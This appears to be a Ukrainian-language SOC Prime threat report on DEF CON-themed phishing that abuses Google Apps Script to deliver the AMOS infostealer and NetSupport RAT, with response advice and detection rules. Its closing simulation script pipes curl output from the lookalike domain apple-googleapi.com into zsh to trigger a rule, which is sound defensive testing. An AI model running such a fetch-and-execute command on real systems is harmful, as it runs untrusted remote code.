SOC Prime Bias: High

21 Aug 2026 16:11 UTC

Фішинг, тематизований DEF CON, зловживає Google Apps Script для доставки шкідливого ПЗ

Author Photo
SOC Prime Team linkedin icon Стежити
Фішинг, тематизований DEF CON, зловживає Google Apps Script для доставки шкідливого ПЗ
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Зловмисники націлюються на відвідувачів конференцій з кібербезпеки, використовуючи соціальну інженерію в X, раніше Twitter, для розповсюдження шкідливого ПЗ через заражені документи Google Docs і шахрайські інсталятори DocSend. Кампанія доставляє AMOS infostealer користувачам macOS, а користувачів Windows вражає багатоступеневий завантажувач, що включає NetSupport RAT і імплант гаманця Ledger. Атака використовує бічні панелі Google Apps Script і підказки в стилі ClickFix для зниження підозр і запуску шкідливого коду.

Розслідування

Дослідники Huntress взаємодіяли з зловмисником, видавши себе за виконавчого директора CoinDesk, щоб спостерігати за повним ланцюгом атаки. Розслідування виявило складний багатоступеневий процес, що включає Google Apps Script, фальшиві інсталятори, підписані вкраденими сертифікатами, і локальний проксі TLS для перехоплення на Windows. Дослідники також виявили другий етап, що виконує JavaScript в пам’яті і розгортає підроблений центр сертифікації.

Пом’якшення

Користувачі повинні вважати підозрілими неочікувані запити на виконання команд терміналу, обходження Gatekeeper або встановлення ручних оновлень з бічних панелей документів. Організації повинні моніторити незвичайну активність Google Apps Script і несанкціоноване використання сертифікатів для підпису коду. Сильні контролі кінцевих точок та незалежна перевірка посилань на спільний доступ до документів можуть додатково знизити вразливість.

Реакція

Якщо виявлена шкідлива активність, уражена система повинна бути негайно ізольована, щоб зупинити ексфільтрацію даних або латеральний рух. Респондери повинні зберегти цифрові докази і розглянути можливість перевстановлення пристрою, при цьому ставлячись до локальних облікових даних і даних криптовалютного гаманця як до компрометованих. Активні сесії повинні бути анульовані, паролі змінені, і всі API ключі або секрети, збережені на системі, замінені.

Перебіг атаки

Ми ще оновлюємо цю частину.

Виявлення

Підозріле управління та контроль за незвичайним верхньорівневим доменом (TLD) запит DNS (через dns)

Команда SOC Prime
21 серпня 2026

Спроба підозрілого виконання curl [MacOS] (через cmdline)

Команда SOC Prime
20 серпня 2026

Можливе виконання з використанням короткого імені скрипта (через cmdline)

Команда SOC Prime
20 серпня 2026

Викликай підозрілі методи .NET з Powershell (через powershell)

Команда SOC Prime
20 серпня 2026

IOC (HashSha256) для виявлення: Post-DEF CON фішинг використовує Google Doc Apps Script для доставки шкідливого ПЗ

Правила SOC Prime AI
20 серпня 2026

IOC (HashMd5) для виявлення: Post-DEF CON фішинг використовує Google Doc Apps Script для доставки шкідливого ПЗ

Правила SOC Prime AI
20 серпня 2026

IOC (SourceIP) для виявлення: Post-DEF CON фішинг використовує Google Doc Apps Script для доставки шкідливого ПЗ

Правила SOC Prime AI
20 серпня 2026

IOC (DestinationIP) для виявлення: Post-DEF CON фішинг використовує Google Doc Apps Script для доставки шкідливого ПЗ

Правила SOC Prime AI
20 серпня 2026

Виявлення заражених DocSend і розгортання NetSupport RAT [створення процесу Windows]

Правила SOC Prime AI
20 серпня 2026

Можливе виконання шкідливого шелл-скрипта на macOS [створення процесу Linux]

Правила SOC Prime AI
20 серпня 2026

Виявлення шкідливого зв’язку і постачання завантажувального ПЗ [мережева з’єднання Windows]

Правила SOC Prime AI
20 серпня 2026

Виявлення створення і виконання шкідливого PowerShell скрипта [Windows Powershell]

Правила SOC Prime AI
20 серпня 2026

## Виконання симуляції

Перелімінарно: Перевірка телеметрії та базового налаштування перед полетом повинна пройти.

Обгрунтування: Цей розділ детально описує точне виконання техніки противника (TTP), призначеної для запуску правила виявлення. Команди та наратив ПОВИННІ безпосередньо відображати виявлені TTPs і намагатись створити ту саму телеметрію, яку очікує логіка виявлення. Абстрактні чи не пов’язані приклади можуть призвести до неправильної діагностики.

  • Сюжет атаки та команди: Противник прагне отримати початковий доступ до робочої станції macOS, маскуючись під законний процес оновлення API Google. Вони використовують тактику соціальної інженерії, де користувачеві наказують виконати команду в Терміналі. Команда використовує curl для отримання корисного навантаження з apple-googleapi.com (домен з помилковою буквою/схоже виглядає) і передає вивід напряму у zsh. Цей підхід “життя з землі” намагається мінімізувати судмедекспертизний слід на файловій системі, виконуючи код безпосередньо з мережевого потоку.

  • Скрипт регресійного тесту:

    #!/bin/bash
    # Симуляційний скрипт для запуску правила "Можливе виконання шкідливого шелл-скрипта".
    # Примітка: Ми використовуємо підроблену URL, що імітує структуру домену, щоб уникнути реальних зовнішніх викликів, якщо це потрібно, 
    # але щоб правило спрацювало, команда має містити 'apple-googleapi.com'.
    
    echo "[*] Початок симуляції: Імітуємо шкідливий шелл-пайп..."
    
    # Ця команда задовольняє всі умови: 
    # 1. Процес - zsh/sh/bash 
    # 2. Містить 'curl' 
    # 3. Містить '| zsh' 
    # 4. Містить 'apple-googleapi.com'
    
    # Ми використовуємо неіснуючий URL, щоб уникнути фактичного виконання завантажуваного ПЗ, але все ще створюючи телеметрію.
    curl -s http://apple-googleapi.com/update.sh | zsh
    
    echo "[*] Симуляційна команда відправлена."
  • Команди очищення:

    # Жодних файлів не створюється на диску самою командою атаки, 
    # але якщо були створені артефакти, їх потрібно видалити.
    rm -f ~/Downloads/update.sh 2>/dev/null
    echo "[*] Очищення завершено."